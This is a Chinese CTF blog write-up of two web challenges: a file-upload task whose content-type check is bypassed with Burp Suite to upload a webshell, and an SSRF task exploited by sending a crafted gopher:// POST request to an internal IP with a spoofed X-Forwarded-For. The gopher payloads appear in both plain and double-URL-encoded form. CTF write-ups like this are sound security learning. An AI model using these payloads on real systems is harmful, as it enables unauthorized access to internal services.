第二届网刃杯web题复现

本文介绍了两道关于Web安全的题目,第一部分涉及文件上传和PHP解析限制,通过Burp Suite修改content-type来尝试绕过。第二部分讨论了SSRF漏洞,特别是结合Gopher协议进行利用,通过构造HTTP数据包并URL编码来访问内部资源获取flag。学习了Gopher协议的基本概念和在SSRF中的应用。
摘要由CSDN通过智能技术生成

好久没有更新了,发现一个月前写的复现还没发布,小小上传一下(忘记下载题目了 只能干巴巴看了 没办法复现了呜呜呜

近期都在学习开发和python,关于web的实在是吐不出什么 等过段时间有空了再继续学习和更新web吧呜呜呜

1.upload

 

是很熟悉的upload题,按照惯例上传个木马看看

显然是对文件content-type的检验,用Bp抓包改包 

回显文件存储路径,访问一下

 发现并不解析php。看到题目说和sql注入有关,那么就浅浅找一下注入点

常规报错注入()

 

2.sign_in

知道是ssrf漏洞但是当时打的时候只想到传参/flag.txt,硬是找不到目录

看了wp才知道是ssrf+gopher协议  涨知识啦

1)gopher协议

Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。

 Gopher协议格式

URL:gopher://<host>:<port>/<gopher-path>_后接上TCP数据流

Gopher发送请求HTTP GET请求:

在gopher协议中发送HTTP的数据,需要以下三步:

1、构造HTTP数据包
2、URL编码、替换回车换行为%0d%0a
3、发送gopher协议

题目

打开题目就是源码

看到curl差不多就是可以想到gopher协议

直接构造一个http数据包,进行url编码,直接进行传参即可

gopher://172.73.23.100:80/_POST / HTTP/1.1
Host: 172.73.23.100:80
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Length: 3

b=1

记得url编码:
1、问号(?)需要转码为URL编码,也就是%3f
2、回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a
3、在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)

或者(某大佬的wp参数 这个确实没看懂)

gopher%3A//172.73.25.100%3A80/_POST%2520/index.php%253Fa%253D11111%2520HTTP/1.1%250D%250AHost%253A%2520172.73.25.100%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AX-forwarded-for%253A%2520127.0.0.1%250D%250AReferer%253A%2520bolean.club%250D%250AContent-Length%253A%252036%250D%250A%250D%250Ab%253Dc384d200658f258e5b5c681bf0aa29a811%250D%250A

得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值